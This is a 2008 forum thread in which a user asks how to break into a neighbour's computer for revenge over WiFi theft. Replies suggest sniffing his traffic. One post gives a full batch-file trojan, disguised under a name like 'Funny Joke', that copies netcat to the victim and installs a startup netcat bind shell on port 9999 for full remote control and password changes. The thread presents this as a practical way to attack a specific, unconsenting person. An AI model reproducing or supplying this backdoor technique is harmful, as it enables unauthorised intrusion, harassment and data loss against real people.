1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Hack Remote Network Computer // payback

Discussion in 'Ethical hacking' started by Rebeleleven, Jun 2, 2008.

  1. Rebeleleven

    Rebeleleven New Member

    Joined:
    Jun 2, 2008
    Messages:
    20
    Likes Received:
    0
    Trophy Points:
    0
    OK, So Im basically in this for a little pay back. This guy has been stealing my internet for awhile now. Some how got around my WEP network. And i know which The guy cause I remeber the computer name. I asked him to stop stealing my internet and he lied to me about it. and this guy is just the biggest d*** you'll ever meet.

    but yes. Im running vista home. I see his computer pop up in my network folder as "thashit" I click on it and it gives me an error saying to check the spelling and blah blah blah, next time I get it I'll have a more detailed report.

    So I dont want to do anything to bad, not like give him a worm or anything. Just delete a few songs maybe chae his background to a nice picture lol. But really, I just want into his computer, if nothing more than to just scare him.

    Thanks
    - Rebeleleven

    p.s. sorry for any misspellings. its 2:30 am where I am and im to tired to reread it lol.
    night.
     
  2. Darkness1337

    Darkness1337 New Member

    Joined:
    Mar 15, 2007
    Messages:
    130
    Likes Received:
    1
    Trophy Points:
    0
    first, make sure tha u have tight security cuz he cud act before you and install a keylogger or somfin, its not that easy but who knows......

    mayb u cud just monitor all your incomin outgoin traffic [sniff], check what websites that guy go on! lol next day when u see him u can jus say "hey u enjoyed tha porno u watched last nite on " " web site"... u can do more than tha lol :p

    a heard Wireshark or Ethereal can do tha kinda stuff lyk monitoring! but erm u on vista :x ...

    read it ere m8:
    http://www.irongeek.com/i.php?page=security/AQuickIntrotoSniffers

    download [try]:
    http://www.mininova.org/tor/435408

    am nt rely sure if they wud work on vista tho!

    ave funz ;)
    | d4x
     
    Last edited: Jun 3, 2008
  3. Rebeleleven

    Rebeleleven New Member

    Joined:
    Jun 2, 2008
    Messages:
    20
    Likes Received:
    0
    Trophy Points:
    0
    Yea, I should have mentioned, im huge on torrents. if a program NEEDs xp or linux I have copies of each so it's all good.

    But yea, I dont think he will really give a care. You know? I already told him I know hes stealing internet, Iunno I dont think it will make a difference. Still worth a try. I'll download all the stuff now and wait for hm to steal my internet again.

    thanks
    ~Rebeleleven
     
  4. Darkness1337

    Darkness1337 New Member

    Joined:
    Mar 15, 2007
    Messages:
    130
    Likes Received:
    1
    Trophy Points:
    0
    :thumbs up:
    quality lol same here, i do dual boot Vista ultimate[no use], XP pro SP3... :D
    and on my external HD i got Ubuntu ! lol n oh yh am gonna install mac OSx leopard soon :p
    ........

    n gd luck wit tha m8 ;)
     
  5. Rebeleleven

    Rebeleleven New Member

    Joined:
    Jun 2, 2008
    Messages:
    20
    Likes Received:
    0
    Trophy Points:
    0
    Yea. On one computer I have vista home (which came with the computer).

    And lets see. I was trying to dual boot my other one to have both vista and xp. with vista already on there. but all the xp disks i had wouldnt boot for some reason. so i just restored it back to xp. Then tried out 2008 server (suck) and now back to xp. :)

    in the grand scheme of things im hoping to install xp to my external hdd so i can boot xp from any computer.
     
  6. SpOonWiZaRd

    SpOonWiZaRd Know what you can do.

    Joined:
    May 30, 2007
    Messages:
    747
    Likes Received:
    8
    Trophy Points:
    0
    Occupation:
    Network Engineer/Programmer
    Location:
    South Africa
    Get netcat, put that in a shared folder on your comoputer, be sure that his computer Must be able
    to copy it from your computer. Every Once a while he will check for stuff thats shared on your comouter which he can
    then copy from you. There will be one filke that you really want him to run, since he is on your network, It's a batch file that you will
    create using notepad, it goes like this:

    @echo off

    c:
    cd\
    xcopy \\(YOUR COMPUTER NAME)\(THE SHARED FOLDER NAME)\netcat.exe
    cd "Documents and Settings"
    cd "All Users"
    cd "start Menu"
    cd Programs
    cd Startup
    xcopy \\(Your COMPUTER NAME)\(THE SHARED FOLDER NAME)\Startup.bat
    cd\
    restart -r -t 05 -c "(Whatever You wana say)"

    His computer will reboot after that, what this batch file do is copy netcat from your computer to his computer on his local
    C: drive, then It copies another batchfile (which we will create now) into his startup folder, the Startup batchfile looks like
    this:

    @echo off

    c:
    cd\
    netcat.exe -L -p 9999 -d -ecmd.exe

    That is it, once that startup folder is there you can then Telnet to port 9999 on his computer and have full access
    on his computer, you can do what you want, even change his windows password to fit your needs. Name the firts batchfile
    "Cool Stuff" or "Funny Joke" or some like that. But once he has executed that one batchfile in the shared folder that copies
    those other 2 programs, you are gonna be his Boss...

    Astalavista!
     
    Darkness1337 likes this.
  7. SpOonWiZaRd

    SpOonWiZaRd Know what you can do.

    Joined:
    May 30, 2007
    Messages:
    747
    Likes Received:
    8
    Trophy Points:
    0
    Occupation:
    Network Engineer/Programmer
    Location:
    South Africa
    Oh yes, um, you need windows XP, I am not sure if it will work on vista.
     
  8. Darkness1337

    Darkness1337 New Member

    Joined:
    Mar 15, 2007
    Messages:
    130
    Likes Received:
    1
    Trophy Points:
    0
  9. Darkness1337

    Darkness1337 New Member

    Joined:
    Mar 15, 2007
    Messages:
    130
    Likes Received:
    1
    Trophy Points:
    0
    oh and this one:
    http://www.robvanderwoude.com/shutdown.html

    oh and one more thing, i dont think that shutting down would work because Rebeleleven is not a admin on that* guys comp so he wud prob get a message saying "Access Denied" but wortha trying!

    gd luck :]
     

Share This Page